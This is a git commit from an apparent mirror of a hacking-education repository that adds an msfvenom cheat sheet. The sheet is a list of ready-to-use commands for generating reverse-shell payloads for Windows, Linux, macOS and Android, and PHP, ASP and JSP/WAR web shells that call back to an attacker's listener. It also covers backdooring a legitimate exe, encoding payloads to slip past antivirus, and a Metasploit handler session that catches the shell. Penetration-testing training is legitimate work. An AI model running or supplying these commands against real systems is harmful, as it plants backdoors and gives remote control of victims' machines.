mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-28 05:30:18 +00:00
Create msfvenom.md
This commit is contained in:
parent
4a4fe151b7
commit
e543079eba
1 changed files with 37 additions and 0 deletions
37
post_exploitation/msfvenom.md
Normal file
37
post_exploitation/msfvenom.md
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
# MSFVenom
|
||||||
|
|
||||||
|
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
|
||||||
|
|
||||||
|
## Creting Binaries
|
||||||
|
`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Creates a simple TCP Payload for Windows
|
||||||
|
`msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Creates a simple HTTP Payload for Windows
|
||||||
|
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
|
||||||
|
`msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho` Creates a simple TCP Shell for Mac
|
||||||
|
`msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk` Creats a simple TCP Payload for Android
|
||||||
|
|
||||||
|
## Web Payloads
|
||||||
|
Command Info
|
||||||
|
`msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php` Creats a Simple TCP Shell for PHP
|
||||||
|
`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp` Creats a Simple TCP Shell for ASP
|
||||||
|
`msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp` Creats a Simple TCP Shell for Javascript
|
||||||
|
`msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war` Creats a Simple TCP Shell for WAR
|
||||||
|
|
||||||
|
## Windows Payloads
|
||||||
|
|
||||||
|
`msfvenom -l encoders` Lists all avalaible encoders
|
||||||
|
`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Binds an exe with a Payload (Backdoors an exe)
|
||||||
|
`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe` Creates a simple TCP payload with shikata_ga_nai encoder
|
||||||
|
`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe` Binds an exe with a Payload and encodes it
|
||||||
|
|
||||||
|
## Getting a Metepreter Shell
|
||||||
|
```
|
||||||
|
omar@ares:~$ sudo msfconsole
|
||||||
|
msf > use exploit/multi/handler
|
||||||
|
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
msf exploit(multi/handler) > set lhost 192.168.1.123
|
||||||
|
lhost => 192.168.1.123
|
||||||
|
msf exploit(multi/handler) > set lport 4444
|
||||||
|
lport => 4444
|
||||||
|
msf exploit(multi/handler) > run
|
||||||
|
```
|
Loading…
Reference in a new issue